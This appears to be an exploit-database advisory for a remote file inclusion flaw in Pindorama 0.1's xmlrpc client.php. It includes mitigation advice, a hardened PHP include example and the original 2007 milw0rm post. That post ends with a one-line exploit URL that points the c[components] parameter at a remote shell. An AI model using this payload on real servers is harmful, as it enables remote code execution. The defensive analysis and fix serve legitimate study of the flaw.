Vendor: Pindorama
By: S.W.A.T.
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: Pindorama
Affected Version From: Pindorama 0.1
Affected Version To: Pindorama 0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Pindorama 0.1 Remote File Inclusion

Pindorama 0.1 is vulnerable to remote file inclusion in the 'client.php' file of the 'xmlrpc' component. The file builds a require_once path from the 'c[components]' request parameter, so an attacker who controls that parameter can make the server include and run attacker-supplied code, leading to remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Pindorama or apply necessary security measures to prevent unauthorized access to the 'client.php' file.
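
A hardened form of the include, as an added example that is not Pindorama's own code: it rejects a request-supplied 'c' array and builds the path from the file's own location on disk. The directory layout is inferred from the advisory's URL and require path, safe_component_path() is a hypothetical helper, and it is an assumption that $c is reachable from the request (for example with register_globals enabled).

```php
<?php
// Added example, not Pindorama code. Assumed layout, inferred from the advisory:
//   active/components/xmlrpc/client.php   (this file)
//   active/components/xmlrpc/common.php
//
// Vulnerable form: the path prefix comes from $c, which the request can set
// (assumption: via register_globals or a similar variable import):
//   require_once($c["components"]."xmlrpc/common.php");

// 1. Refuse any request that tries to supply the configuration array.
foreach (array($_GET, $_POST, $_COOKIE) as $input) {
    if (array_key_exists('c', $input)) {
        header('HTTP/1.1 400 Bad Request');
        exit('Invalid request');
    }
}

// 2. Derive the components directory from this file's location on disk,
//    so no request value can influence it.
$componentsDir = realpath(dirname(__FILE__) . '/..');

/**
 * Resolve $relative under $baseDir. Returns the real path, or false when the
 * file is missing, is a URL, or resolves outside $baseDir (../ or symlinks).
 */
function safe_component_path($baseDir, $relative)
{
    if ($baseDir === false) {
        return false;
    }
    $real   = realpath($baseDir . DIRECTORY_SEPARATOR . $relative);
    $prefix = rtrim($baseDir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $real;
}

$common = safe_component_path($componentsDir, 'xmlrpc/common.php');
if ($common === false) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('Component not found');
}
require_once $common;
```

Setting allow_url_include = Off in php.ini (PHP 5.2.0 and later) blocks remote URLs in include/require as a second layer, but it does not stop local file inclusion, so the path fix is still needed.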

Exploit-DB raw data:

                       \\\|///
                     \\  - -  //      Xmors Underground Group
                      (  @ @ )
               
               ----oOOo--(_)-oOOo--------------------------------------------------
               Portal   :  Pindorama 0.1
               Download :  http://downloads.sourceforge.net/pindorama/pindorama-0.1.zip
               Author   :  S.W.A.T.
               HomePage :  wWw.XmorS.CoM
               Type     :  Remote File Inclusion
               Y! ID    :  Svvateam
               E-Mail   :  Svvateam@yahoo.com / S.W.4.T@hackermail.com
               Dork     :   :( 
               
               ----ooooO-----Ooooo--------------------------------------------------
                   (   )     (   )
                    \ (       ) /
                     \_)     (_/



+---------------------------------------------------------------------------------------------+

Vuln Code :

require_once($c["components"]."xmlrpc/common.php");

+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+

Exploit :

http://[TARGET]/[PATH]/active/components/xmlrpc/client.php?c[components]=[-Sh3ll-]


+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-10-11]